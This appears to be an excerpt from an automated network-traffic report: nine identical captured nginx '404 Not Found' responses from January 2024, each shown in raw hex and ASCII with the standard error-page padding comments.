Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:34 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:35 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
